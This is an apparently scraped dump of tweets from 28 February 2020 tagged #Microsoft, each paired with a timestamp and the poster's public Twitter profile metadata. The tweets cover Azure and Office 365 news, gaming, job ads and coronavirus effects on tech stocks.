    <t>{'id': 986466892549410816, 'id_str': '986466892549410816', 'name': 'Enterprise Network Nordic', 'screen_name': 'ennordic', 'location': 'Nordic countries', 'description': '#ENNordic is a #Office365 community, with a focus on #Nordic users and administrators. \n\n#OfficeHelp #OfficeNews #Microsoft #collaboration #communication', 'url': 'https://t.co/aLgv0yojdD', 'entities': {'url': {'urls': [{'url': 'https://t.co/aLgv0yojdD', 'expanded_url': 'https://www.linkedin.com/groups/8278829', 'display_url': 'linkedin.com/groups/8278829', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 63, 'listed_count': 1, 'created_at': 'Wed Apr 18 04:50:09 +0000 2018', 'favourites_count': 1592, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1308,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'http://pbs.twimg.com/profile_images/1162690988894314496/rG9U9Wy7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1162690988894314496/rG9U9Wy7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/986466892549410816/1567318712',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</si>
  <si>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13:06:15 +0000 2020</t>
  </si>
  <si>
    <t>Just waiting on the tech like... #mightaswellwatchtv #techjunkie #microsoft #surfacepro2 https://t.co/hK7IftVMJL</t>
  </si>
  <si>
    <t>{'id': 988006128, 'id_str': '988006128', 'name': 'Aaron Reynolds', 'screen_name': 'Reynoldsam89', 'location': 'Wichita, KS', 'description': 'Loving life and everything it has thrown at me #grow #live #love', 'url': 'https://t.co/YHriD2lgyE', 'entities': {'url': {'urls': [{'url': 'https://t.co/YHriD2lgyE', 'expanded_url': 'https://politicallymurican.wordpress.com/', 'display_url': 'politicallymurican.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 135, 'friends_count': 159, 'listed_count': 0, 'created_at': 'Tue Dec 04 04:24:50 +0000 2012', 'favourites_count': 732, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1370,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'http://pbs.twimg.com/profile_images/734569381619867649/Fqdkq5xq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/734569381619867649/Fqdkq5xq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/988006128/1463969962', 'profile_link_color': '000000',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</si>
  <si>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Fri Feb 28 13:05:16 +0000 2020</t>
  </si>
  <si>
    <t>Discussing #DirectAccess and #Windows 10 Always On #VPN on the @RunAsRadio podcast. #Microsoft #Windows10 #Win10 #aovpn #mobility https://t.co/LZYVLLflp7</t>
  </si>
  <si>
    <t>Fri Feb 28 13:04:49 +0000 2020</t>
  </si>
  <si>
    <t>#SenseiSherlock enjoyed talking to @bschorr at @ABATECHSHOW about his new responsibilities within #Microsoft, basically focused on end-user #security for #Windows &amp;amp; #Office  @sharonnelsonesq and John helped fill his notebook with things to do #ABATECHSHOW https://t.co/oWgstylYv9 https://t.co/baxk7TTI1n</t>
  </si>
  <si>
    <t>{'id': 266090037, 'id_str': '266090037', 'name': 'Sensei Enterprises', 'screen_name': 'SenseiEnt', 'location': 'Fairfax, Virginia', 'description': 'Sensei Enterprises, Inc. is a nationally known digital forensics, cybersecurity and IT company based in Fairfax, Virginia.', 'url': 'http://t.co/fVp1RoHfPC', 'entities': {'url': {'urls': [{'url': 'http://t.co/fVp1RoHfPC', 'expanded_url': 'http://www.senseient.com', 'display_url': 'senseient.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 968, 'friends_count': 1338, 'listed_count': 106, 'created_at': 'Mon Mar 14 16:50:56 +0000 2011', 'favourites_count': 1789, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6599,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'http://pbs.twimg.com/profile_images/634792041617100800/AivwGYoe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/634792041617100800/AivwGYoe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/266090037/1581078247', 'profile_link_color': 'DF7401', 'profile_sidebar_border_color': 'DFDFDF', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '444444', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 13:04:39 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud. #transformation #Azure #Microsoft https://t.co/Eah0JDYmTX</t>
  </si>
  <si>
    <t>{'id': 1178430308057849857, 'id_str': '1178430308057849857', 'name': 'Enoche Andrade', 'screen_name': 'EnocheAndrade', 'location': 'Dallas/Fort Worth Area', 'description': 'Chief Transformation OfficerðŸ”¸Innovation Leader ðŸ”¸ Strategist #CSuite #Leadership #DigitalTransformation #BusinessTransformation #Innovation #CyberSecurity', 'url': 'https://t.co/tsNX7fijAl', 'entities': {'url': {'urls': [{'url': 'https://t.co/tsNX7fijAl', 'expanded_url': 'https://www.linkedin.com/in/enocheandrade', 'display_url': 'linkedin.com/in/enocheandraâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 101, 'friends_count': 279, 'listed_count': 0, 'created_at': 'Sun Sep 29 22:04:22 +0000 2019', 'favourites_count': 75, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 823, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1187025809552347137/EzgQ6SII_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187025809552347137/EzgQ6SII_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1178430308057849857/1572196119',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</si>
  <si>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13:03:31 +0000 2020</t>
  </si>
  <si>
    <t>Clement Clerc  Game Programmer  Game Design
https://t.co/6d4AorlOgb
#apple #microsoft #ibm #goupil #logo #macintosh #mac #informatique #musee #ordinateurs #logiciels #pionnier #algorithme #tech #devops #coding #computing #programming #javascript #c #java #python #basic https://t.co/WNyGLwzV0G</t>
  </si>
  <si>
    <t>{'id': 3666837329, 'id_str': '3666837329', 'name': 'Daniel CLERC', 'screen_name': 'clercdaniel2', 'location': '', 'description': 'Enseignant - Informaticien - Photographe - Cycliste - curieux', 'url': 'https://t.co/BNJM3McwZz', 'entities': {'url': {'urls': [{'url': 'https://t.co/BNJM3McwZz', 'expanded_url': 'https://danielclerc.fr/index.htm', 'display_url': 'danielclerc.fr/index.htm', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 2, 'listed_count': 18, 'created_at': 'Tue Sep 15 19:06:02 +0000 2015', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10811,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'http://pbs.twimg.com/profile_images/972056412829421568/zTEV4hx__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/972056412829421568/zTEV4hx__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3666837329/1535569397',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</si>
  <si>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13:01:02 +0000 2020</t>
  </si>
  <si>
    <t>Is #cloud really that popular? Mark Kirstein of BitTitan discusses the use of containers, how #Microsoft and #Google will seize market share from #AWS and how #5G will usher in the next level of cloud adoption, exclusively on Ping! Zine: https://t.co/qcBJySezWX https://t.co/5g52bv5ndS</t>
  </si>
  <si>
    <t>{'id': 1113990063413764096, 'id_str': '1113990063413764096', 'name': 'Ping! Zine Web Hosting Magazine', 'screen_name': 'pingzinemag', 'location': '', 'description': 'Authoritative content by executive leaders on web hosting, cloud, cybersecurity and IT.', 'url': 'https://t.co/G3cEfv5w4u', 'entities': {'url': {'urls': [{'url': 'https://t.co/G3cEfv5w4u', 'expanded_url': 'http://www.pingzine.com', 'display_url': 'pingzine.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Fri Apr 05 02:21:42 +0000 2019',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'http://pbs.twimg.com/profile_images/1118555567843360768/Gs06v8UJ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118555567843360768/Gs06v8UJ_normal.png',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</si>
  <si>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We're hiring! #PartTime #Administrator based in #Hale #Salary 10 per hour.
#Admin #Recruitment #CustomerService #Microsoft
Get in touch today to find out more, or #Apply now https://t.co/1Rw6bKhgGC https://t.co/QcO4wVWAKW</t>
  </si>
  <si>
    <t>{'id': 2589166392, 'id_str': '2589166392', 'name': 'HalecroftRecruitment', 'screen_name': 'HalecroftRec', 'location': 'Hale, England', 'description': 'Exec Search &amp; Selection. Perm. Contract. Interim. HR/Finance/Supply Chain/Digital Marketing/PA &amp; Business Support. #UK #Recruiters 0161 905 0526', 'url': 'https://t.co/cSeSFFZm2J', 'entities': {'url': {'urls': [{'url': 'https://t.co/cSeSFFZm2J', 'expanded_url': 'http://www.halecroftrecruitment.co.uk', 'display_url': 'halecroftrecruitment.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2327, 'friends_count': 4176, 'listed_count': 167, 'created_at': 'Thu Jun 26 08:37:54 +0000 2014', 'favourites_count': 4765, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6015, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F2E9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1078698155569491969/zYwydyvL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1078698155569491969/zYwydyvL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2589166392/1577793137',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</si>
  <si>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13:00:56 +0000 2020</t>
  </si>
  <si>
    <t>Function Friday: CURRENT_TIMESTAMP (T-SQL) - https://t.co/sEH8ON02WM #functionfriday #sqlserver #microsoft</t>
  </si>
  <si>
    <t>{'id': 145074254, 'id_str': '145074254', 'name': 'Mike Scalise', 'screen_name': 'themikescalise', 'location': 'Rochester, NY', 'description': "Entrepreneur, co-founder of @acappellablog, emcee &amp; host for @VarsityVocals competitions. I also make SQL queries run screaming-fast. I'm all about the vocals.", 'url': 'https://t.co/5UCByHYyGI', 'entities': {'url': {'urls': [{'url': 'https://t.co/5UCByHYyGI', 'expanded_url': 'http://www.michaelscalise.com', 'display_url': 'michaelscalise.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 225, 'listed_count': 19, 'created_at': 'Tue May 18 02:10:01 +0000 2010', 'favourites_count': 60, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 468,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'http://pbs.twimg.com/profile_images/829121004525993985/9IJre4Z-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/829121004525993985/9IJre4Z-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/145074254/1486513076',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</si>
  <si>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13:00:30 +0000 2020</t>
  </si>
  <si>
    <t>Go into the tennis court again and smash your way through the championships in Smash Court Tennis 3 https://t.co/syHgO3Ai3r #microsoft #xbox360 #fun #gamer #tennis https://t.co/txMmEJPUbG</t>
  </si>
  <si>
    <t>Fri Feb 28 13:00:19 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft announces Azure Sphere secure IoT service has arrived after years of building and testing: https://t.co/mgtlmy3git
#Microsoft #Azure #IoT #AzureSphere</t>
  </si>
  <si>
    <t>Fri Feb 28 13:00:18 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft announces Azure Sphere secure IoT service has arrived after years of building and testing: https://t.co/bgrRSzV2A0
#Microsoft #Azure #IoT #AzureSphere</t>
  </si>
  <si>
    <t>Fri Feb 28 13:00:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft announces Azure Sphere secure IoT service has arrived after years of building and testing: https://t.co/lwUWNr30fu
#Microsoft #Azure #IoT #AzureSphere</t>
  </si>
  <si>
    <t>Fri Feb 28 13:00:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft announces Azure Sphere secure IoT service has arrived after years of building and testing: https://t.co/40NK8kR1M3
#Microsoft #Azure #IoT #AzureSphere</t>
  </si>
  <si>
    <t>Fri Feb 28 13:00:02 +0000 2020</t>
  </si>
  <si>
    <t>Stop slowing your team down.  Project management doesn't have to be painful.  Learn how #SharePoint can help your teams collaborate and complete projects quicker. https://t.co/0bGCWLX4tb
#microsoft #office365 #microsoft365 #sharepoint #sharepointonline #collaboration https://t.co/IS5i2c1lon</t>
  </si>
  <si>
    <t>Companies with high US sales will out-perform those with high foreign sales #supplychain #coronavirus #apple #microsoft #China #economy https://t.co/Vuv4VJjr0U</t>
  </si>
  <si>
    <t>Fri Feb 28 12:57:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's comprehensive #IoT security solution (#AzureSphere)  is now generally available.  A major step forward into securing IoT.
https://t.co/EukulDrX75</t>
  </si>
  <si>
    <t>{'id': 1069274954175315968, 'id_str': '1069274954175315968', 'name': 'JM Business Security ðŸ‡¬ðŸ‡§', 'screen_name': 'JMBusSec', 'location': 'England', 'description': 'Promoting #CyberSecurity, #Privacy and #Scam Awareness as an integral part of what we do.  Expressed opinions are the authors alone.', 'url': 'https://t.co/9UPf0Dfwnu', 'entities': {'url': {'urls': [{'url': 'https://t.co/9UPf0Dfwnu', 'expanded_url': 'http://www.JMBusinessSecurity.co.uk', 'display_url': 'JMBusinessSecurity.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 40, 'friends_count': 62, 'listed_count': 1, 'created_at': 'Sun Dec 02 16:59:50 +0000 2018', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3325, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1077344719011827712/ZH8p6vfB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1077344719011827712/ZH8p6vfB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1069274954175315968/1566830642',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</si>
  <si>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12:57:20 +0000 2020</t>
  </si>
  <si>
    <t>SwiftKey Keyboard for Android receives dark mode and a redesigned Setting page #SwiftKey #Microsoft: https://t.co/3knHDFIdrH via @NeowinFeed</t>
  </si>
  <si>
    <t>Fri Feb 28 12:56:28 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Flight Simulator Feedback Snapshot for March and April unveiled #microsoft #flightsimulator: https://t.co/gms1uIB8ky via @NeowinFeed</t>
  </si>
  <si>
    <t>Fri Feb 28 12:55:16 +0000 2020</t>
  </si>
  <si>
    <t>FINALLY 100% the game lol #twitch #stream #siege #tomclancy #ubisoft #xbox #microsoft #tomclancysrainbowsixsiege #rainbowsixsiege #achievementhunter #achievement  https://t.co/oSZSUEuUu6</t>
  </si>
  <si>
    <t>{'id': 445788266, 'id_str': '445788266', 'name': 'ShadowSICK66', 'screen_name': 'ShadowSICK_66', 'location': 'New Zealand', 'description': 'All i want to do is bring my imagination, thoughts, dreams and ideas to life! https://t.co/Lang0z3v3i', 'url': 'https://t.co/Lang0z3v3i', 'entities': {'url': {'urls': [{'url': 'https://t.co/Lang0z3v3i', 'expanded_url': 'http://twitch.tv/shadowsick66', 'display_url': 'twitch.tv/shadowsick66', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/Lang0z3v3i', 'expanded_url': 'http://twitch.tv/shadowsick66', 'display_url': 'twitch.tv/shadowsick66', 'indices': [78, 101]}]}}, 'protected': False, 'followers_count': 166, 'friends_count': 340, 'listed_count': 9, 'created_at': 'Sat Dec 24 21:43:52 +0000 2011', 'favourites_count': 651, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9499,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'http://pbs.twimg.com/profile_images/1134445765244309504/GBdzI1Ek_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134445765244309504/GBdzI1Ek_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/445788266/1559307944', 'profile_link_color': '49BD35',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</si>
  <si>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Feb 28 12:55:02 +0000 2020</t>
  </si>
  <si>
    <t>Improve collaboration across apps and customize experiencesheres whats new to #Microsoft 365 in February https://t.co/LJkiMPoFzw https://t.co/93sjTnzN2Q</t>
  </si>
  <si>
    <t>Fri Feb 28 12:54:08 +0000 2020</t>
  </si>
  <si>
    <t>Now boarding for work hard-play hard weekend! @scottishsummit #SS2020 #Office365 #Microsoft365 #MicrosoftTeams #SharePoint #PowerPlatform #Microsoft https://t.co/nr2BmDUFL9</t>
  </si>
  <si>
    <t>Fri Feb 28 12:54:06 +0000 2020</t>
  </si>
  <si>
    <t>@Anticleric What a beauty! Now I feel what jealousy means...
I really really really need a computer #microsoft #dell #razer</t>
  </si>
  <si>
    <t>{'id': 210533168, 'id_str': '210533168', 'name': 'Art Wonder', 'screen_name': 'NYC512', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 105, 'listed_count': 0, 'created_at': 'Sun Oct 31 17:26:06 +0000 2010', 'favourites_count': 563, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 84,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'http://pbs.twimg.com/profile_images/1088783927395926017/mTDJMAj6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088783927395926017/mTDJMAj6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/210533168/1548421290',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</si>
  <si>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Fri Feb 28 12:54:00 +0000 2020</t>
  </si>
  <si>
    <t>@Ferrari @asphalt @gameloft @Xbox @TwitterGaming @YouTubeGaming @GoogleStadia @FNATIC @ASUS_ROG @Twitch #Asphalt9 Unlocked #Lamborghini Egoista
#Asphalt #Asphalt9Legends #Xbox #XboxGame #XboxGaming #GameChanger #Gaming #Gamer #gamers #GamersUnite  #Racer #CarRacing #Racing #gamedev #games #Windows10 #Windows10Game #XboxOne #XboxOneX #Car #Cars #PS5 #GamerGuy #Microsoft #Gameloft https://t.co/R1dFlexzrq</t>
  </si>
  <si>
    <t>{'id': 848737164888166400, 'id_str': '848737164888166400', 'name': 'ï¾Œï¾‘á¯ä¹‡ä¹‡ï½²ã‚“', 'screen_name': 'ijaveeth', 'location': '', 'description': "Cannot load the user's info. Please try again later", 'url': 'https://t.co/lAtTqbQQRE', 'entities': {'url': {'urls': [{'url': 'https://t.co/lAtTqbQQRE', 'expanded_url': 'http://ijaveeth.blogspot.com', 'display_url': 'ijaveeth.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 115, 'listed_count': 0, 'created_at': 'Mon Apr 03 03:21:23 +0000 2017', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2516, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1212029900682452998/nPfWIl5S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212029900682452998/nPfWIl5S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/848737164888166400/1570279736',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</si>
  <si>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12:53:04 +0000 2020</t>
  </si>
  <si>
    <t>This #LinkedIn invite just stole my heart 
#Microsoft #MicrosoftLife #WomenInTech #WomenWhoCode #SoftwareEngineering #Recruiter #Recruiting https://t.co/JDxJRWIU4C</t>
  </si>
  <si>
    <t>Fri Feb 28 12:52:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Windows: What you need to know about what's coming next... https://t.co/lhvt9pEOQC https://t.co/g0KHUHxZzh</t>
  </si>
  <si>
    <t>{'id': 695256564379336704, 'id_str': '695256564379336704', 'name': 'Mavin Global', 'screen_name': 'MavinGlobal_IT', 'location': 'Wootton Wawen, England', 'description': 'IT services and solutions, award winning Containerised Datacentre solutions.', 'url': 'https://t.co/vRkfZSi8A6', 'entities': {'url': {'urls': [{'url': 'https://t.co/vRkfZSi8A6', 'expanded_url': 'http://www.mavin.global', 'display_url': 'mavin.global', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 210, 'friends_count': 535, 'listed_count': 4, 'created_at': 'Thu Feb 04 14:44:16 +0000 2016', 'favourites_count': 711, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 518,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'http://pbs.twimg.com/profile_images/697046302731931652/pmLf223t_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/697046302731931652/pmLf223t_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/695256564379336704/1455024787',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</si>
  <si>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12:51:42 +0000 2020</t>
  </si>
  <si>
    <t>The cloud for modern business
We provide Microsoft Azure Cloud Services, For more info
visit https://t.co/5Qhu9F5ksl or contact 8778668043 / 9677455754
#DigitalTransformation #Microsoft #Azure #cloud https://t.co/mdSPWlhxEU</t>
  </si>
  <si>
    <t>{'id': 1161539350502490117, 'id_str': '1161539350502490117', 'name': 'Toverto Solutions Private Limited', 'screen_name': 'TovertoSolution', 'location': 'Coimbatore', 'description': 'Software Development company\n\nWe provide IT services and software solutions to customers across all domains.', 'url': 'https://t.co/014aekZgcI', 'entities': {'url': {'urls': [{'url': 'https://t.co/014aekZgcI', 'expanded_url': 'http://toverto.com', 'display_url': 'toverto.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Wed Aug 14 07:25:36 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1161539809854349312/pTOV_l_2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161539809854349312/pTOV_l_2_normal.png',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</si>
  <si>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12:51:10 +0000 2020</t>
  </si>
  <si>
    <t>The enterprise's journey to #DigitalTransformation using #Microsoft #PowerAutomate https://t.co/kfxRG36vkA</t>
  </si>
  <si>
    <t>{'id': 2735054276, 'id_str': '2735054276', 'name': 'Confluent', 'screen_name': 'BeConfluent', 'location': 'United States', 'description': 'Business Process Improvement &amp; Automation | #Microsoft Certified Partner using the #PowerPlatform to #DigitallyTransform businesses', 'url': 'https://t.co/4HjasauFVQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/4HjasauFVQ', 'expanded_url': 'http://www.BeConfluent.com', 'display_url': 'BeConfluent.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 182, 'friends_count': 147, 'listed_count': 46, 'created_at': 'Fri Aug 15 17:43:08 +0000 2014', 'favourites_count': 623, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 404,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'http://pbs.twimg.com/profile_images/991027258616877057/DgzVIm2d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/991027258616877057/DgzVIm2d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2735054276/1525114296',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</si>
  <si>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12:48:43 +0000 2020</t>
  </si>
  <si>
    <t>@LucyAliceBourne @JoelLindstrom Great suggestion @LucyAliceBourne.  In fact two of the greatest Jedi Knight CRM/Power speakers Ive ever witnessed both had come from @HitachiSolUS in @JoelLindstrom and @scottsewell who is now with the #Microsoft Blackbelt Team</t>
  </si>
  <si>
    <t>{'id': 1330592748, 'id_str': '1330592748', 'name': 'Tony Stein', 'screen_name': 'tsteinUG', 'location': 'Fargo, ND', 'description': 'Family, Golf, Football, Hunting, and CRM = All Passions', 'url': 'https://t.co/FtuRYfI7YS', 'entities': {'url': {'urls': [{'url': 'https://t.co/FtuRYfI7YS', 'expanded_url': 'http://www.d365ug.com', 'display_url': 'd365ug.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 689, 'friends_count': 366, 'listed_count': 20, 'created_at': 'Sat Apr 06 03:34:38 +0000 2013', 'favourites_count': 959, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 488,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'http://pbs.twimg.com/profile_images/378800000385264558/eef927d9679a334ddccba4ff497de0ac_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000385264558/eef927d9679a334ddccba4ff497de0ac_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1330592748/1493218110',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</si>
  <si>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12:47:18 +0000 2020</t>
  </si>
  <si>
    <t>Miss yesterdays webcast? Grab the recording and resources today- Microsoft Teams Live Events Webcast #MicrosoftTeams #microsoft  https://t.co/CoKa3j7eht</t>
  </si>
  <si>
    <t>Fri Feb 28 12:45:57 +0000 2020</t>
  </si>
  <si>
    <t>"#Google &amp;amp; #Microsoft are accelerating efforts to shift production of their new phones, computers &amp;amp; other devices from #China to SE Asia amid the worsening #coronavirus outbreak, w/factories in #Vietnam &amp;amp; #Thailand the beneficiaries"
#China #SupplyChain
https://t.co/HGLc6BND42</t>
  </si>
  <si>
    <t>{'id': 497231011, 'id_str': '497231011', 'name': 'China Beige Book', 'screen_name': 'ChinaBeigeBook', 'location': 'NYC, DC, London, Hong Kong', 'description': 'CBB provides the worldâ€™s only large-scale, private data on the Chinese economy (RTs not necessarily endorsements).', 'url': 'https://t.co/8eVs7IdicN', 'entities': {'url': {'urls': [{'url': 'https://t.co/8eVs7IdicN', 'expanded_url': 'http://bit.ly/Twitter_ChinaBeigeBook', 'display_url': 'bit.ly/Twitter_ChinaBâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10250, 'friends_count': 709, 'listed_count': 323, 'created_at': 'Sun Feb 19 19:20:12 +0000 2012', 'favourites_count': 2158, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4258,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'http://pbs.twimg.com/profile_images/895027554548989953/lG5cqJ2S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/895027554548989953/lG5cqJ2S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/497231011/1505190602',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</si>
  <si>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12:45:13 +0000 2020</t>
  </si>
  <si>
    <t>Has your company outgrown its accounting software? Here are five tell-tale signs to watch out for, and how to grow beyond the limits. Get the infographic. https://t.co/WDe4PMfuF6
#Microsoft #Technology #IT #BusinessAutomation #accounting #MSDyn365 https://t.co/JMRi8GGdMO</t>
  </si>
  <si>
    <t>{'id': 201720210, 'id_str': '201720210', 'name': 'Intelligent Technologies, Inc.', 'screen_name': 'inteltechGSO', 'location': 'Greensboro, NC', 'description': 'Hi!  We offer technology to make SMBs &amp; the people who run them more efficient &amp; productive. Our focus is Acumatica, MSFT Dynamics, Office 365 &amp; networking.', 'url': 'https://t.co/WrE9B3Jaq1', 'entities': {'url': {'urls': [{'url': 'https://t.co/WrE9B3Jaq1', 'expanded_url': 'https://www.inteltech.com', 'display_url': 'inteltech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 796, 'friends_count': 513, 'listed_count': 154, 'created_at': 'Tue Oct 12 13:41:24 +0000 2010', 'favourites_count': 3251, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12600, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/966082204261429249/kS-9CNYI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/966082204261429249/kS-9CNYI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/201720210/1515695768', 'profile_link_color': '0C469D', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '6591CE', 'profile_text_color': '1E1E1F', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 12:45:10 +0000 2020</t>
  </si>
  <si>
    <t>New Release Microsoft Risk and Compliance Management in M365 #office #microsoft #security  
https://t.co/dueNUW5wG9</t>
  </si>
  <si>
    <t>Fri Feb 28 12:45:00 +0000 2020</t>
  </si>
  <si>
    <t>How to find the secret #surfing game in #Microsoft #Edge https://t.co/SVE3wrBrDq via @thenextweb</t>
  </si>
  <si>
    <t>Fri Feb 28 12:41:55 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus Drives Tech Stocks Crazy: AAPL and MSFT Down around 7%
https://t.co/kd1hpVJyXO
#coronavirus #apple #microsoft https://t.co/NIEci7xwmb</t>
  </si>
  <si>
